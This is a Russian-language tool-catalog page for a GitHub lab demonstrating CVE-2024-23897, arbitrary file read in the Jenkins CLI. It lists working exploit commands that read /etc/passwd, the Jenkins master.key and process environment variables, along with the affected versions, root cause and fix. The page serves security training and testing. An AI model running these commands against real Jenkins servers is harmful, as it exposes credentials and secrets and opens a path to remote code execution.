Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-23897 | Kitploit
Инструменты/GitHubGitHub/dungsocool/cve-2024-23897
Сканеры уязвимостейЭксплуатацияВеб-безопасностьОбучение и ОбразованиеЛаборатории и Практика
GitHubdungsocool/cve-2024-23897

CVE-2024-23897

Репозиторий
1 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-23897 — Произвольное чтение файлов в Jenkins CLI

Быстрый старт

root@kitploit:~
# 1. Запустите лабораторию
docker-compose up -d

# 2. Подождите ~30 секунд, затем скачайте CLI-инструмент
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar

# 3. Эксплойт — чтение /etc/passwd (полный файл)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd

# 4. Читаем master.key (цепочка до RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key

# 5. Чтение переменных окружения
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ

Подробности

Полный технический анализ (на вьетнамском) — в REPORT.md.

ПараметрЗначение
CVSS9.8 (критический)
Затронутые версииJenkins <= 2.441, LTS <= 2.426.2
Версия лабораторииjenkins/jenkins:2.426.2-lts
Корневая причинаargs4j expandAtFiles включён в серверном CLI
ИсправлениеОбновите до Jenkins >= 2.442 / LTS >= 2.426.3

Очистка

root@kitploit:~
docker-compose down -v --remove-orphans
Скачать инструмент